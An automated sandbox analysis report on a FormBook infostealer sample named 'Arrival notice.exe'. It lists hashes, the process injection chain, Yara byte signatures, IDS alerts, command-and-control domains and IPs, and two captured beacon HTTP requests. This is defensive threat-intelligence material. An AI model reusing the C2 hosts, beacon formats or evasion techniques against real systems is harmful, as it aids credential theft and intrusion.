Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Arrival notice.exe

Overview

General Information

Sample name:Arrival notice.exe
Analysis ID:1527837
MD5:50397bfab2624cccb8c7ae8ce667048c
SHA1:719db4c99ee56ff658a1b477e589dffbc37fa582
SHA256:ebd5341fb10c3fd26e72d2664961d062bdd4982fe95c327a32aeb4784742e9d8
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Arrival notice.exe (PID: 5980 cmdline: "C:\Users\user\Desktop\Arrival notice.exe" MD5: 50397BFAB2624CCCB8C7AE8CE667048C)
    • svchost.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\Arrival notice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • JGgOTaRBeKg.exe (PID: 6332 cmdline: "C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 7812 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • firefox.exe (PID: 8112 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c110:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1435f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x5b00c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x4325b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          9.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f5a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x177f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          9.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            9.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e7a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x169f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Arrival notice.exe", CommandLine: "C:\Users\user\Desktop\Arrival notice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival notice.exe", ParentImage: C:\Users\user\Desktop\Arrival notice.exe, ParentProcessId: 5980, ParentProcessName: Arrival notice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival notice.exe", ProcessId: 7524, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Arrival notice.exe", CommandLine: "C:\Users\user\Desktop\Arrival notice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival notice.exe", ParentImage: C:\Users\user\Desktop\Arrival notice.exe, ParentProcessId: 5980, ParentProcessName: Arrival notice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival notice.exe", ProcessId: 7524, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T10:38:24.034900+020028554651A Network Trojan was detected192.168.2.104997676.223.105.23080TCP
            2024-10-07T10:38:48.458941+020028554651A Network Trojan was detected192.168.2.104998065.21.196.9080TCP
            2024-10-07T10:39:02.300481+020028554651A Network Trojan was detected192.168.2.1049984162.0.238.24680TCP
            2024-10-07T10:39:17.791894+020028554651A Network Trojan was detected192.168.2.104998846.17.172.4980TCP
            2024-10-07T10:39:31.200575+020028554651A Network Trojan was detected192.168.2.104999262.149.128.4080TCP
            2024-10-07T10:39:52.808450+020028554651A Network Trojan was detected192.168.2.104999645.130.41.1380TCP
            2024-10-07T10:40:08.997373+020028554651A Network Trojan was detected192.168.2.10500003.33.130.19080TCP
            2024-10-07T10:40:26.456468+020028554651A Network Trojan was detected192.168.2.1050004203.175.9.12880TCP
            2024-10-07T10:40:40.524385+020028554651A Network Trojan was detected192.168.2.105000838.47.233.6580TCP
            2024-10-07T10:41:14.589098+020028554651A Network Trojan was detected192.168.2.1050012172.81.61.22480TCP
            2024-10-07T10:41:28.052429+020028554651A Network Trojan was detected192.168.2.1050016194.58.112.17480TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T10:38:40.234348+020028554641A Network Trojan was detected192.168.2.104997765.21.196.9080TCP
            2024-10-07T10:38:42.784111+020028554641A Network Trojan was detected192.168.2.104997865.21.196.9080TCP
            2024-10-07T10:38:45.357708+020028554641A Network Trojan was detected192.168.2.104997965.21.196.9080TCP
            2024-10-07T10:38:54.248351+020028554641A Network Trojan was detected192.168.2.1049981162.0.238.24680TCP
            2024-10-07T10:38:57.755804+020028554641A Network Trojan was detected192.168.2.1049982162.0.238.24680TCP
            2024-10-07T10:38:59.405237+020028554641A Network Trojan was detected192.168.2.1049983162.0.238.24680TCP
            2024-10-07T10:39:10.093055+020028554641A Network Trojan was detected192.168.2.104998546.17.172.4980TCP
            2024-10-07T10:39:12.676381+020028554641A Network Trojan was detected192.168.2.104998646.17.172.4980TCP
            2024-10-07T10:39:15.263845+020028554641A Network Trojan was detected192.168.2.104998746.17.172.4980TCP
            2024-10-07T10:39:23.554267+020028554641A Network Trojan was detected192.168.2.104998962.149.128.4080TCP
            2024-10-07T10:39:26.122566+020028554641A Network Trojan was detected192.168.2.104999062.149.128.4080TCP
            2024-10-07T10:39:28.656511+020028554641A Network Trojan was detected192.168.2.104999162.149.128.4080TCP
            2024-10-07T10:39:45.159373+020028554641A Network Trojan was detected192.168.2.104999345.130.41.1380TCP
            2024-10-07T10:39:47.713671+020028554641A Network Trojan was detected192.168.2.104999445.130.41.1380TCP
            2024-10-07T10:39:50.288138+020028554641A Network Trojan was detected192.168.2.104999545.130.41.1380TCP
            2024-10-07T10:39:59.396243+020028554641A Network Trojan was detected192.168.2.10499973.33.130.19080TCP
            2024-10-07T10:40:00.896362+020028554641A Network Trojan was detected192.168.2.10499983.33.130.19080TCP
            2024-10-07T10:40:04.423030+020028554641A Network Trojan was detected192.168.2.10499993.33.130.19080TCP
            2024-10-07T10:40:18.911820+020028554641A Network Trojan was detected192.168.2.1050001203.175.9.12880TCP
            2024-10-07T10:40:21.459216+020028554641A Network Trojan was detected192.168.2.1050002203.175.9.12880TCP
            2024-10-07T10:40:24.005624+020028554641A Network Trojan was detected192.168.2.1050003203.175.9.12880TCP
            2024-10-07T10:40:32.606531+020028554641A Network Trojan was detected192.168.2.105000538.47.233.6580TCP
            2024-10-07T10:40:35.345060+020028554641A Network Trojan was detected192.168.2.105000638.47.233.6580TCP
            2024-10-07T10:40:37.913354+020028554641A Network Trojan was detected192.168.2.105000738.47.233.6580TCP
            2024-10-07T10:40:47.083973+020028554641A Network Trojan was detected192.168.2.1050009172.81.61.22480TCP
            2024-10-07T10:40:49.630667+020028554641A Network Trojan was detected192.168.2.1050010172.81.61.22480TCP
            2024-10-07T10:40:52.177647+020028554641A Network Trojan was detected192.168.2.1050011172.81.61.22480TCP
            2024-10-07T10:41:20.404455+020028554641A Network Trojan was detected192.168.2.1050013194.58.112.17480TCP
            2024-10-07T10:41:22.943302+020028554641A Network Trojan was detected192.168.2.1050014194.58.112.17480TCP
            2024-10-07T10:41:25.484237+020028554641A Network Trojan was detected192.168.2.1050015194.58.112.17480TCP
            2024-10-07T10:41:36.640485+020028554641A Network Trojan was detected192.168.2.10500173.33.130.19080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for domain / URL
            Source: chalet-tofane.netVirustotal: Detection: 8%Perma Link
            Source: platinumkitchens.infoVirustotal: Detection: 9%Perma Link
            Source: http://www.chalet-tofane.net/vv4m/Virustotal: Detection: 7%Perma Link
            Source: http://www.platinumkitchens.info/nkwh/Virustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Arrival notice.exeReversingLabs: Detection: 55%
            Source: Arrival notice.exeVirustotal: Detection: 45%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Arrival notice.exeJoe Sandbox ML: detected
            Source: Arrival notice.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000009.00000003.1689351235.0000000003031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689337789.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689193431.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000003.1798946272.000000000124F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JGgOTaRBeKg.exe, 0000000B.00000000.1640439845.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Arrival notice.exe, 00000002.00000003.1338414590.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1337835940.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1338176959.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1620535046.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1622258941.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1725316747.0000000004683000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1727564650.000000000483F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Arrival notice.exe, 00000002.00000003.1338414590.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1337835940.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1338176959.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1620535046.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1622258941.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1725316747.0000000004683000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1727564650.000000000483F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mobsync.pdb source: svchost.exe, 00000009.00000003.1689351235.0000000003031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689337789.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689193431.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000003.1798946272.000000000124F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000006CFC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000501C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003F7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000006CFC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000501C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003F7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_007FC690 FindFirstFileW,FindNextFileW,FindClose,12_2_007FC690
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 4x nop then xor eax, eax11_2_09168AAC
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 4x nop then pop edi11_2_091655C5
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 4x nop then mov esp, ebp11_2_09162FAC
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 4x nop then xor eax, eax12_2_007E9BB0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 4x nop then mov ebx, 00000004h12_2_048304E9

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49980 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 45.130.41.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49985 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49999 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49977 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50008 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49992 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50012 -> 172.81.61.224:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49984 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50013 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50001 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50017 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49991 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49988 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49995 -> 45.130.41.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49997 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50004 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50006 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49979 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49976 -> 76.223.105.230:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49996 -> 45.130.41.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50005 -> 38.47.233.65:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49993 -> 45.130.41.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49978 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49987 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49989 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50011 -> 172.81.61.224:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50009 -> 172.81.61.224:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50010 -> 172.81.61.224:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50015 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50000 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50016 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49983 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50014 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50007 -> 38.47.233.65:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.030002304.xyz
            Source: DNS query: www.kilbmn.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.moritynomxd.xyz
            Source: Joe Sandbox ViewIP Address: 162.0.238.246 162.0.238.246
            Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
            Source: Joe Sandbox ViewIP Address: 38.47.233.65 38.47.233.65
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfFme/uWZ2yYnPkPJRTtnUR7GmwOpWBkY/43NiHjgDg3aX97mZZ8znKIfN0Q==&7NP=7FXXUPl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.wearenotgoingback.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /u38h/?EZ2lo=iaxEuHPh9M0PkCehiVmYq99vb8GYcF42nF8/pgvOtFqWiDn4lMrJ/WO5nlbDSyDBFBFfwqZzhOOdUgIoiT3LOtzwEygyB6NUSlIKo/1Br+QrM4rsiQ==&7NP=7FXXUPl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.030002304.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
